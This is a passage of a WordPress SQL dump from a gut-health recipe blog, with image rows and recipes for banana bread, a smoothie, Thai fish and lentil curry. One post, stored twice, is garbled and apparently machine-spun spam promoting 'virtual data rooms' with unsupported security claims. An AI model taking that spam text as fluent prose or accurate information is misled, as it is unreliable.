21:53:35','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/pozadina-1.jpg',0,'attachment','image/jpeg',0),(4592,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic21.png','','inherit','closed','closed','','landing-slide1-graphic21-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic21.png',0,'attachment','image/png',0),(4593,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic11.png','','inherit','closed','closed','','landing-slide1-graphic11-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic11.png',0,'attachment','image/png',0),(4594,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic41.png','','inherit','closed','closed','','landing-slide1-graphic41-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic41.png',0,'attachment','image/png',0),(4595,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic31.png','','inherit','closed','closed','','landing-slide1-graphic31-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic31.png',0,'attachment','image/png',0),(4596,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic51.png','','inherit','closed','closed','','landing-slide1-graphic51-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic51.png',0,'attachment','image/png',0),(4597,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic71.png','','inherit','closed','closed','','landing-slide1-graphic71-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic71.png',0,'attachment','image/png',0),(4598,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic61.png','','inherit','closed','closed','','landing-slide1-graphic61-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic61.png',0,'attachment','image/png',0),(4599,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-slide1-graphic81.png','','inherit','closed','closed','','landing-slide1-graphic81-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic81.png',0,'attachment','image/png',0),(4600,1,'2020-03-30 21:53:40','2020-03-30 21:53:40','','landing-brown-31.png','','inherit','closed','closed','','landing-brown-31-png','','','2020-03-30 21:53:40','2020-03-30 21:53:40','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-brown-31.png',0,'attachment','image/png',0),(4601,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-brown-21.jpg','','inherit','closed','closed','','landing-brown-21-jpg','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-brown-21.jpg',0,'attachment','image/jpeg',0),(4602,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','sh-single-landing1.png','','inherit','closed','closed','','sh-single-landing1-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/sh-single-landing1.png',0,'attachment','image/png',0),(4603,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-footer-img21.png','','inherit','closed','closed','','landing-footer-img21-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-footer-img21.png',0,'attachment','image/png',0),(4604,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-slide2-graphic31.png','','inherit','closed','closed','','landing-slide2-graphic31-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide2-graphic31.png',0,'attachment','image/png',0),(4605,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-slide2-graphic41.png','','inherit','closed','closed','','landing-slide2-graphic41-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide2-graphic41.png',0,'attachment','image/png',0),(4606,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-slide1-graphic81.png','','inherit','closed','closed','','landing-slide1-graphic81-png-2','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide1-graphic81.png',0,'attachment','image/png',0),(4607,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-slide2-graphic51.png','','inherit','closed','closed','','landing-slide2-graphic51-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide2-graphic51.png',0,'attachment','image/png',0),(4608,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-slide2-graphic61.png','','inherit','closed','closed','','landing-slide2-graphic61-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide2-graphic61.png',0,'attachment','image/png',0),(4609,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-slide2-graphic71.png','','inherit','closed','closed','','landing-slide2-graphic71-png','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-slide2-graphic71.png',0,'attachment','image/png',0),(4610,1,'2020-03-30 21:53:41','2020-03-30 21:53:41','','landing-cimet-img-71.png','','inherit','closed','closed','','landing-cimet-img-71-png-2','','','2020-03-30 21:53:41','2020-03-30 21:53:41','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/landing-cimet-img-71.png',0,'attachment','image/png',0),(4611,1,'2020-03-30 21:53:42','2020-03-30 21:53:42','','nova-vocka1.png','','inherit','closed','closed','','nova-vocka1-png','','','2020-03-30 21:53:42','2020-03-30 21:53:42','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/nova-vocka1.png',0,'attachment','image/png',0),(4612,1,'2020-03-30 21:53:42','2020-03-30 21:53:42','','recept-11.png','','inherit','closed','closed','','recept-11-png-2','','','2020-03-30 21:53:42','2020-03-30 21:53:42','',0,'http://tummyrevolution.com/wp-content/uploads/revslider/recept-11.png',0,'attachment','image/png',0),(4618,1,'2020-04-03 11:43:46','2020-04-03 11:43:46','

Today there are a lot of developments on the market, which may improve selected business operations. But just a secure data room is a extensive, versatile, and completely protected tool.

\"virtual

Business conversation in the modern world

Today it is just necessary to quickly prepare proof, attract thirdparty specialists, job remotely with colleagues and partners. Methods to do it easily and safely? Of course , applying virtual dataroom. Just upload documents to your account. Even more, almost all the effort to ensure the coverage of your commercial and private data will be done suitable for you. The paperwork is kept on secure servers that will work possibly in intense situations and create a couple of backups in various processing centers.

During data, the most trustworthy encryption strategies and storage space of encryption keys are being used. The virtual data room uses only the most successful technologies, which in turn meet superior standards, while required by the international protocol for the security of webdevelopment. And how staff members, colleagues and partners will continue to work with the info can be governed by you. Choose one of eight gain access to levels and activate special restrictions (protected viewing setting, restriction by simply IP address or perhaps time). Additionally , all activities with each file are recorded in a log, that you can always discover.

Control over business and confidential data

The virtual dataroom reliably protects data and give you control over the use. As a result of this, organization communication will probably be completely protected and portable. You can quickly work on projects together with your team. This will help a special chat with the ability to perform polls and polls, along with useful statistics. You can learn how much time was used on all duties and high were complications. A secure exchange of documentation allows you to collaborate even more with experts and shareholders around the world.

You cannot only conduct business interaction without risks, but likewise better understand your prospective customers, investors. Of course, all the details of their work with important computer data will be available for you. data rooms also let you conduct on the web meetings and quickly finish transactions of any complexness. This tool is simply a must within a dynamic and globalized market. Your workers and associates will definitely enjoy it, because using it is very easy.

Get started with system today

You can safely start employing the data room virtual today. Service of the evaluation mode is certainly thirty days of totally free use. Captivate employees, companions to this method and learn from your experience how exactly a business can become simpler and even more convenient. Personal experience is actually better than feedback or just information.

If you have only a few questions, then the technical support will deliver answers to them within just fifteen minutes. And you will apply for support at any time of the day. Today, more and more businesses are switching to using , since it is profitable and. Switch to a modern day format and also you!

','Dataroom: Organization Innovation','','publish','open','open','','dataroom-organization-innovation','','','2020-04-03 11:43:46','2020-04-03 11:43:46','',0,'http://tummyrevolution.com/?p=4618',0,'post','',0),(4619,1,'2020-04-03 11:43:46','2020-04-03 11:43:46','

Today there are a lot of developments on the market, which may improve selected business operations. But just a secure data room is a extensive, versatile, and completely protected tool.

\"virtual

Business conversation in the modern world

Today it is just necessary to quickly prepare proof, attract thirdparty specialists, job remotely with colleagues and partners. Methods to do it easily and safely? Of course , applying virtual dataroom. Just upload documents to your account. Even more, almost all the effort to ensure the coverage of your commercial and private data will be done suitable for you. The paperwork is kept on secure servers that will work possibly in intense situations and create a couple of backups in various processing centers.

During data, the most trustworthy encryption strategies and storage space of encryption keys are being used. The virtual data room uses only the most successful technologies, which in turn meet superior standards, while required by the international protocol for the security of webdevelopment. And how staff members, colleagues and partners will continue to work with the info can be governed by you. Choose one of eight gain access to levels and activate special restrictions (protected viewing setting, restriction by simply IP address or perhaps time). Additionally , all activities with each file are recorded in a log, that you can always discover.

Control over business and confidential data

The virtual dataroom reliably protects data and give you control over the use. As a result of this, organization communication will probably be completely protected and portable. You can quickly work on projects together with your team. This will help a special chat with the ability to perform polls and polls, along with useful statistics. You can learn how much time was used on all duties and high were complications. A secure exchange of documentation allows you to collaborate even more with experts and shareholders around the world.

You cannot only conduct business interaction without risks, but likewise better understand your prospective customers, investors. Of course, all the details of their work with important computer data will be available for you. data rooms also let you conduct on the web meetings and quickly finish transactions of any complexness. This tool is simply a must within a dynamic and globalized market. Your workers and associates will definitely enjoy it, because using it is very easy.

Get started with system today

You can safely start employing the data room virtual today. Service of the evaluation mode is certainly thirty days of totally free use. Captivate employees, companions to this method and learn from your experience how exactly a business can become simpler and even more convenient. Personal experience is actually better than feedback or just information.

If you have only a few questions, then the technical support will deliver answers to them within just fifteen minutes. And you will apply for support at any time of the day. Today, more and more businesses are switching to using , since it is profitable and. Switch to a modern day format and also you!

','Dataroom: Organization Innovation','','inherit','closed','closed','','4618-revision-v1','','','2020-04-03 11:43:46','2020-04-03 11:43:46','',4618,'http://tummyrevolution.com/2020/04/03/4618-revision-v1/',0,'revision','',0),(4622,1,'2020-04-04 23:01:32','2020-04-04 23:01:32','','RECIPES','recipes','publish','closed','closed','','recipes','','','2020-04-04 23:20:19','2020-04-04 23:20:19','',0,'http://tummyrevolution.com/?post_type=wpematico&p=4622',0,'wpematico','',0),(4634,1,'2020-04-04 23:07:31','2020-04-04 23:07:31',' ','','','publish','closed','closed','','4634','','','2020-04-04 23:07:31','2020-04-04 23:07:31','',0,'http://tummyrevolution.com/?p=4634',104,'nav_menu_item','',0),(4652,1,'2020-04-12 03:45:41','2020-04-12 03:45:41','\n

I tend to have banana bread or banana muffins in my freezer most of the time because I\'m one of those people who like snacking. In fact, I think I need to have snacks in order to stay happy throughout the day. That said, I try to go for healthy snacks rather then unhealthy and I do, of course, also like my snacks to be tummy friendly.

Banana bread is good in many ways 1. it\'s relatively healthy, 2. you can make it tummy friendly, 3. You can use up your old brown bananas and make something yummy out of it. Another good thing about making banana bread for me is that I don\'t tend to eat a whole loaf of banana bread....I mean, that would be very, very rare :-I So I tend to freeze the majority of the loaf in slices, which means I can just get one slice out to defrost in the toaster when I feel the need for a snack. My favourite way to have them is in the afternoon with a lovely cup of english tea...bliss.

\n\n\n\n

I have tried many banana bread recipes and some are better then others. Some are tastier, some are healthier and some are easier to make than others I have taken inspiration form these and given you my favourite tummy friendly recipes below. They are both easy to make and you can just whizz them up in minutes. I prefer to make the second recipe as muffins but you can also make it as a loaf.

Have a try and let me know what you think xoxo

\n\n\n\n
\"\"/
\n\n\n\n

HEALTHY BANANA BREAD WITH MAPLE SYRUP

\n\n\n\n

INGREDIENTS:
2 large very ripe bananas, mashed (plus one extra sliced in half for topping)
1/3 cup extra virgin olive oil
1/2 cup maple syrup
1/2 cup gluten free oats 
1 3/4 cup gluten free flour mix
2 eggs
1/4 cup almond milk
2 tsp baking powder
2 tsp cinnamon
1 tsp vanilla extract
Pinch of salt

METHOD:
1. Pre-heat oven to 160 degrees Celsius 

\n\n\n\n

2. In a bowl combine maple syrup and oil with a whisk. Add eggs, almond milk and bananas and combine.

\n\n\n\n

3. Add all remaining ingredients and combine well.

\n\n\n\n

4. Pour batter into a baking paper lined loaf pan.

\n\n\n\n

5. Top with extra banana

6. Bake for 1 hour or until baked through (test with a skewer. If it comes out clean it\'s ready)).

7. Let it cool in the tin for 15 minutes then turn out onto a cooling racket cool further.

Slice, eat and enjoy or freeze


SUPER EASY ONE BOWL BANANA BREAD MUFFINS

INGREDIENTS

\n\n\n\n

Makes 10 muffins

\n\n\n\n

3 medium bananas

\n\n\n\n

2 cup (90g) oats 

\n\n\n\n

2 large eggs

\n\n\n\n

¼ cup (4 tablespoons) maple syrup

\n\n\n\n

1 tsp baking powder

\n\n\n\n

¼ cup (30g) walnuts, roughly chopped

\n\n\n\n

10 muffin cases

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 185°C (350°F)

\n\n\n\n

2. Line a muffin tray with 10 paper muffin cases. Alternatively line a loaf tin with baking paper

\n\n\n\n

3. Add the bananas, oats, eggs, maple syrup and baking powder to a blender and mix until smooth

\n\n\n\n

4. Add the chopped walnuts and pour the batter into the muffin cases and garnish with a banana slice if desired

\n\n\n\n

5. Bake in the oven for 20-25 minutes or until the muffins are golden brown

\n\n\n\n

6. Once the muffins have cooled you can either store them in the fridge or freeze them. Get one or two out when you need that all important afternoon treat

\n\n\n\n
\"\"/
\n','Banana bread & muffins','','publish','open','open','','banana-bread-muffins','','','2020-04-13 07:09:41','2020-04-13 07:09:41','',0,'http://tummyrevolution.com/?p=4652',0,'post','',0),(4653,1,'2020-04-04 23:29:23','2020-04-04 23:29:23','','banana_bread6_2048x2048','','inherit','open','closed','','banana_bread6_2048x2048','','','2020-04-04 23:29:23','2020-04-04 23:29:23','',4652,'http://tummyrevolution.com/wp-content/uploads/2020/04/banana_bread6_2048x2048.jpg',0,'attachment','image/jpeg',0),(4654,1,'2020-04-04 23:29:41','2020-04-04 23:29:41','\n

I tend to have banana bread or banana muffins in my freezer most of the time because I\'m one of those people who like snacking. In fact, I think I need to have snacks in order to stay happy throughout the day. That said, I try to go for healthy snacks rather then unhealthy and I do, of course, also like my snacks to be tummy friendly.

Banana bread is good in many ways 1. it\'s relatively healthy, 2. you can make it tummy friendly, 3. You can use up your old brown bananas and make something yummy out of it. Another good thing about making banana bread for me is that I don\'t tend to eat a whole loaf of banana bread....I mean, that would be very, very rare :-I So I tend to freeze the majority of the loaf in slices, which means I can just get one slice out to defrost in the toaster when I feel the need for a snack. My favourite way to have them is in the afternoon with a lovely cup of english tea...bliss.

\n\n\n\n

I have tried many banana bread recipes and some are better then others. Some are tastier, some are healthier and some are easier to make than others I have taken inspiration form these and given you my favourite tummy friendly recipes below. They are both easy to make and you can just whizz them up in minutes. I prefer to make the second recipe as muffins but you can also make it as a loaf.

Have a try and let me know what you think xoxo

\n\n\n\n
\"\"/
\n\n\n\n

HEALTHY BANANA BREAD WITH MAPLE SYRUP

\n\n\n\n

INGREDIENTS:
2 large very ripe bananas, mashed (plus one extra sliced in half for topping)
1/3 cup extra virgin olive oil
1/2 cup maple syrup
1/2 cup gluten free oats 
1 3/4 cup gluten free flour mix
2 eggs
1/4 cup almond milk
2 tsp baking powder
2 tsp cinnamon
1 tsp vanilla extract
Pinch of salt

METHOD:
1. Pre-heat oven to 160 degrees Celsius 

\n\n\n\n

2. In a bowl combine maple syrup and oil with a whisk. Add eggs, almond milk and bananas and combine.

\n\n\n\n

3. Add all remaining ingredients and combine well.

\n\n\n\n

4. Pour batter into a baking paper lined loaf pan.

\n\n\n\n

5. Top with extra banana

6. Bake for 1 hour or until baked through (test with a skewer. If it comes out clean it\'s ready)).

7. Let it cool in the tin for 15 minutes then turn out onto a cooling racket cool further.

Slice, eat and enjoy or freeze


SUPER EASY ONE BOWL BANANA BREAD MUFFINS

INGREDIENTS

\n\n\n\n

Makes 10 muffins

\n\n\n\n

3 medium bananas

\n\n\n\n

2 cup (90g) oats 

\n\n\n\n

2 large eggs

\n\n\n\n

¼ cup (4 tablespoons) maple syrup

\n\n\n\n

1 tsp baking powder

\n\n\n\n

¼ cup (30g) walnuts, roughly chopped

\n\n\n\n

10 muffin cases

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 185°C (350°F)

\n\n\n\n

2. Line a muffin tray with 10 paper muffin cases. Alternatively line a loaf tin with baking paper

\n\n\n\n

3. Add the bananas, oats, eggs, maple syrup and baking powder to a blender and mix until smooth

\n\n\n\n

4. Add the chopped walnuts and pour the batter into the muffin cases and garnish with a banana slice if desired

\n\n\n\n

5. Bake in the oven for 20-25 minutes or until the muffins are golden brown

\n\n\n\n

6. Once the muffins have cooled you can either store them in the fridge or freeze them. Get one or two out when you need that all important afternoon treat

\n\n\n\n
\"\"/
\n','Banana bread & muffins','','inherit','closed','closed','','4652-revision-v1','','','2020-04-04 23:29:41','2020-04-04 23:29:41','',4652,'http://tummyrevolution.com/2020/04/04/4652-revision-v1/',0,'revision','',0),(4655,1,'2020-04-04 23:37:29','2020-04-04 23:37:29','','Screenshot_1','','inherit','open','closed','','screenshot_1','','','2020-04-05 00:07:15','2020-04-05 00:07:15','',4652,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot_1.png',0,'attachment','image/png',0),(4656,1,'2020-04-12 03:40:00','2020-04-12 03:40:00','\n

\n\nThis rich chocolaty smoothie is a great little treat or an energy booster after exercise.
It\'s quick and easy to make and I love the great flavour cacao brings to this smoothie . If you\'re suffering with digestive issues, eating too much fruit can trigger symptoms. Also, some fruits can cause more issues than others. Some smoothies contain a lot of fruit so if you want to enjoy a smoothie just make sure it\'s only got about one portion of tummy friendly fruit in it. You might think adding courgette seems strange but you won\'t even notice it as it\'s a pretty tasteless vegetable. So adding it will add a portion of veg without you even noticing. A big plus in my opinion.

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
1 banana
¼ courgette
250 ml ( 1 cup) almond milk
1 tbsp raw cacao powder
1 tbsp maple syrup
1 tsp pure vanilla extract
1 tsp chia seeds
2 tsp sunflower seeds
a few ice cubes

\n\n\n\n

METHOD
1. Peal the banana and chop up in smaller peaces
2. Chop up a quarter of a courgette
3. Add the banana, courgette and all other ingredients to either a smoothie maker, food processor or a hand held blender. Whizz all the ingredients together well
4. Sprinkle some seeds on top for decoration
5. Serve straight away\n\n

\n','Raw cacao smoothie','','publish','open','open','','raw-cacao-smoothie','','','2020-04-13 07:34:19','2020-04-13 07:34:19','',0,'http://tummyrevolution.com/?p=4656',0,'post','',0),(4657,1,'2020-04-04 23:48:05','2020-04-04 23:48:05','','2','','inherit','open','closed','','2','','','2020-04-04 23:48:05','2020-04-04 23:48:05','',4656,'http://tummyrevolution.com/wp-content/uploads/2020/04/2.jpg',0,'attachment','image/jpeg',0),(4658,1,'2020-04-04 23:48:14','2020-04-04 23:48:14','\n

\n\nThis rich chocolaty smoothie is a great little treat or an energy booster after exercise.
It\'s quick and easy to make and I love the great flavour cacao brings to this smoothie . If you\'re suffering with digestive issues, eating too much fruit can trigger symptoms. Also, some fruits can cause more issues than others. Some smoothies contain a lot of fruit so if you want to enjoy a smoothie just make sure it\'s only got about one portion of tummy friendly fruit in it. You might think adding courgette seems strange but you won\'t even notice it as it\'s a pretty tasteless vegetable. So adding it will add a portion of veg without you even noticing. A big plus in my opinion.

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
1 banana
¼ courgette
250 ml ( 1 cup) almond milk
1 tbsp raw cacao powder
1 tbsp maple syrup
1 tsp pure vanilla extract
1 tsp chia seeds
2 tsp sunflower seeds
a few ice cubes

\n\n\n\n

METHOD
1. Peal the banana and chop up in smaller peaces
2. Chop up a quarter of a courgette
3. Add the banana, courgette and all other ingredients to either a smoothie maker, food processor or a hand held blender. Whizz all the ingredients together well
4. Sprinkle some seeds on top for decoration
5. Serve straight away\n\n

\n','Raw cacao smoothie','','inherit','closed','closed','','4656-revision-v1','','','2020-04-04 23:48:14','2020-04-04 23:48:14','',4656,'http://tummyrevolution.com/4656-revision-v1/',0,'revision','',0),(4659,1,'2020-04-12 15:35:42','2020-04-12 15:35:42','\n

Happy New Year to you all! Hope you\'ve had an enjoyable festive period. 
Are you all set for a new year and new adventures? I hope so! There\'s no better place to start new adventures then in the kitchen if you ask me :) Asian food is so tasty and every time I cook an asian dish I wonder why I don\'t do it more often because the flavours are usually amazing. This Asian dish is not just beautiful but it\'s also full of lovely flavours. The lemongrass in the sauce is a delicate flavour that works very well with fish and the crunchy cucumber brings another texture to the dish.

I found this recipe on a food blog called \'Well-fed soul\' and I thought I\'d try it out (you can find the original recipe here). I wanted to make it \'tummy friendly\' so I had to change a few ingredients such as the noodles and the garlic. I also choose white fish instead of salmon as in the original recipe. Sometimes I find recipes I want to try but find that they have too many ingredients that my tummy doesn\'t agree with. 
Sometimes it can be easy to substitute ingredients for more \'tummy friendly\' alternatives, but sometimes it\'s just not possible. I try to choose recipes where I can see it won\'t be too hard to substitute ingredients and most of the time it works out well. This time it worked out really well and I can honestly say that this is the best fish dish I\'ve had in a long time. I love the thai sauce that you use for the fish and noodles and the spiralized cucumbers really compliment the fish and flavours. It was fairly easy to make too so I would definitely recommend trying it out. It\'s a perfect dish to kickstart your new year! 

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
2 tbsp garlic infused olive oil
1 ½ tbsp minced lemon grass
1 tbsp freshly grated ginger
60ml (¼ cup) soya or tamari
2 tbsp rice vinegar
2 tsp maple syrup
500g fish filets such as cod, hake or salmon
2 spring onions, finely chopped 
salt & pepper to taste
200g brown rice noodles 
¼ courgette/zucchini, spiralized
½ cucumber, spiralized 
Some fresh basil
Some toasted pine nuts

\n\n\n\n

INSTRUCTIONS
Heat a large frying pan over medium-high heat; add 1 tbsp garlic infused olive oil.  Add the lemongrass, ginger; saute 1 minute until fragrant, then remove from heat and transfer to a small bowl. Whisk in the soya (or tamari), rice vinegar, and maple syrup. 

\n\n\n\n

Return the frying pan to medium-high heat and add the remaining 1 tbsp of garlic infused olive oil.  Season the fish fillets with salt and pepper, then lightly brush each with 1-2 tbsp.of the lemongrass sauce.   

\n\n\n\n

When the frying pan is hot, add the fish, (skin-side down if it has skin); sear until golden, about 3-4 minutes, then flip with tongs and reduce heat to medium.  Continue cooking an additional 6-8 minutes or until the fish is cooked through.

Meanwhile, bring a large pot of water to a boil; add the brown rice noodles and cook according to package directions. Cook until noodles are done, then drain and return the noodles to the pot.  Add the remaining lemongrass sauce to the noodles, tossing with tongs to coat. 

\n\n\n\n
\"\"/
\n\n\n\n

Serve the fish on top of a bed of rice noodles with spiralized cucumber, spring onions, toasted pine nuts, and fresh basil if desired.

\n','Thai infused fish, brown rice noodles & spirilized cucumber','','publish','open','open','','thai-infused-fish-with-brown-rice-noodles-and-spirilized-cucumber','','','2020-04-19 06:34:03','2020-04-19 06:34:03','',0,'http://tummyrevolution.com/?p=4659',0,'post','',0),(4660,1,'2020-04-04 23:49:42','2020-04-04 23:49:42','\n

Happy New Year to you all! Hope you\'ve had an enjoyable festive period. 
Are you all set for a new year and new adventures? I hope so! There\'s no better place to start new adventures then in the kitchen if you ask me :) Asian food is so tasty and every time I cook an asian dish I wonder why I don\'t do it more often because the flavours are usually amazing. This Asian dish is not just beautiful but it\'s also full of lovely flavours. The lemongrass in the sauce is a delicate flavour that works very well with fish and the crunchy cucumber brings another texture to the dish.

I found this recipe on a food blog called \'Well-fed soul\' and I thought I\'d try it out (you can find the original recipe here). I wanted to make it \'tummy friendly\' so I had to change a few ingredients such as the noodles and the garlic. I also choose white fish instead of salmon as in the original recipe. Sometimes I find recipes I want to try but find that they have too many ingredients that my tummy doesn\'t agree with. 
Sometimes it can be easy to substitute ingredients for more \'tummy friendly\' alternatives, but sometimes it\'s just not possible. I try to choose recipes where I can see it won\'t be too hard to substitute ingredients and most of the time it works out well. This time it worked out really well and I can honestly say that this is the best fish dish I\'ve had in a long time. I love the thai sauce that you use for the fish and noodles and the spiralized cucumbers really compliment the fish and flavours. It was fairly easy to make too so I would definitely recommend trying it out. It\'s a perfect dish to kickstart your new year! 

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
2 tbsp garlic infused olive oil
1 ½ tbsp minced lemon grass
1 tbsp freshly grated ginger
60ml (¼ cup) soya or tamari
2 tbsp rice vinegar
2 tsp maple syrup
500g fish filets such as cod, hake or salmon
2 spring onions, finely chopped 
salt & pepper to taste
200g brown rice noodles 
¼ courgette/zucchini, spiralized
½ cucumber, spiralized 
Some fresh basil
Some toasted pine nuts

\n\n\n\n

INSTRUCTIONS
Heat a large frying pan over medium-high heat; add 1 tbsp garlic infused olive oil.  Add the lemongrass, ginger; saute 1 minute until fragrant, then remove from heat and transfer to a small bowl. Whisk in the soya (or tamari), rice vinegar, and maple syrup. 

\n\n\n\n

Return the frying pan to medium-high heat and add the remaining 1 tbsp of garlic infused olive oil.  Season the fish fillets with salt and pepper, then lightly brush each with 1-2 tbsp.of the lemongrass sauce.   

\n\n\n\n

When the frying pan is hot, add the fish, (skin-side down if it has skin); sear until golden, about 3-4 minutes, then flip with tongs and reduce heat to medium.  Continue cooking an additional 6-8 minutes or until the fish is cooked through.

Meanwhile, bring a large pot of water to a boil; add the brown rice noodles and cook according to package directions. Cook until noodles are done, then drain and return the noodles to the pot.  Add the remaining lemongrass sauce to the noodles, tossing with tongs to coat. 

\n\n\n\n
\"\"/
\n\n\n\n

Serve the fish on top of a bed of rice noodles with spiralized cucumber, spring onions, toasted pine nuts, and fresh basil if desired.

\n','Thai infused fish with brown rice noodles and spirilized cucumber','','inherit','closed','closed','','4659-revision-v1','','','2020-04-04 23:49:42','2020-04-04 23:49:42','',4659,'http://tummyrevolution.com/4659-revision-v1/',0,'revision','',0),(4661,1,'2020-04-04 23:50:54','2020-04-04 23:50:54','','fish_thai_web_2048x2048','','inherit','open','closed','','fish_thai_web_2048x2048','','','2020-04-04 23:50:54','2020-04-04 23:50:54','',4659,'http://tummyrevolution.com/wp-content/uploads/2020/04/fish_thai_web_2048x2048.jpg',0,'attachment','image/jpeg',0),(4662,1,'2020-04-12 01:35:00','2020-04-12 01:35:00','\n
\"\"/
\n\n\n\n

It can be tempting to eat foods that we like but that might not be that kind on our guts. If you like a nice curry then this is a great tummy-friendly alternative to the usual take away. You can make it ahead of time, as it\'s one of those curries that tastes even better the next day. Legumes such as lentils have some great health benefits but can be a troublesome food for sensitive tummies because they are naturallyhigh in oligos. The good news is that oligos dissolve in water and canned lentils tend to be lower in FODMAPs as some oligos ‘leach’ out into the canning water and are removed when they are drained and rinsed.

This recipe is from my book \"Tummy Revolution 21, Gut Health made simple\" which is a comprehensive 21 day plan to better gut health with over 50+ tummy friendly recipes and tools to help you on your way to better gut health. It\'s been featured in many magazines and newspapers with great reviews. You can find it on Amazon UK HERE, and US HERE or Australia HERE Take a look and hope you enjoy the recipe :)

\n\n\n\n

INGREDIENTS

\n\n\n\n
  • 500 ml (2 cups) diced pumpkin
  • 4 cm piece of ginger
  • 5 spring onions (green part only)
  • 1fresh chilli
  • 1 bunch fresh coriander
  • 2 tbsp garlic infused oil
  • 1 tsp mild curry powder
  • 1tsp turmeric
  • 1 tin (400g) chopped tomatoes
  • 1 tin (400g) coconut milk
  • 1tbsp tomato purée
  • 1 tbsp brown sugar (or maple syrup)
  • 1 tin (400g) lentils
  • 1 lime, juice of
  • Salt and pepper
  • pumpkin seeds for garnishing (optional)
\n\n\n\n

 
INSTRUCTIONS

\n\n\n\n

Chop the pumpkin into dice size pieces.

\n\n\n\n

Finely slice the chilli and the green part of the spring onion.

\n\n\n\n

Cut the ginger into matchstick-size pieces and then gather them in a row. Slice in the opposite direction.

\n\n\n\n

Chop up the coriander stalks and leave the leaves for later.

\n\n\n\n

Pour the garlic infused oil into a large saucepan and place on a high heat. Add the ginger and red chilli, then reduce to a medium heat. Cook until golden, then add the curry powder, coriander stalks and spring onion and fry for 1 minute.

\n\n\n\n

Add the turmeric, chopped tomatoes, tomato puree, brown sugar and coconut milk. Bring to the boil, then add the pumpkin. Reduce the heat, cover with a lid and simmer for 30 minutes. Add the lentils and let it simmer for another 20-30 minutes until it thickens. Stir occasionally and add some more water if it looks dry.

\n\n\n\n

Stir in the lime juice and season with salt and pepper.

\n\n\n\n

Sprinkle with some coriander leaves and serve with rice.

\n','Pumpkin & Lentil Curry','','publish','open','open','','pumpkin-lentil-curry','','','2020-04-13 07:30:36','2020-04-13 07:30:36','',0,'http://tummyrevolution.com/?p=4662',0,'post','',0),(4663,1,'2020-04-04 23:55:29','2020-04-04 23:55:29','\n
\"\"/
\n\n\n\n

It can be tempting to eat foods that we like but that might not be that kind on our guts. If you like a nice curry then this is a great tummy-friendly alternative to the usual take away. You can make it ahead of time, as it\'s one of those curries that tastes even better the next day. Legumes such as lentils have some great health benefits but can be a troublesome food for sensitive tummies because they are naturallyhigh in oligos. The good news is that oligos dissolve in water and canned lentils tend to be lower in FODMAPs as some oligos ‘leach’ out into the canning water and are removed when they are drained and rinsed.

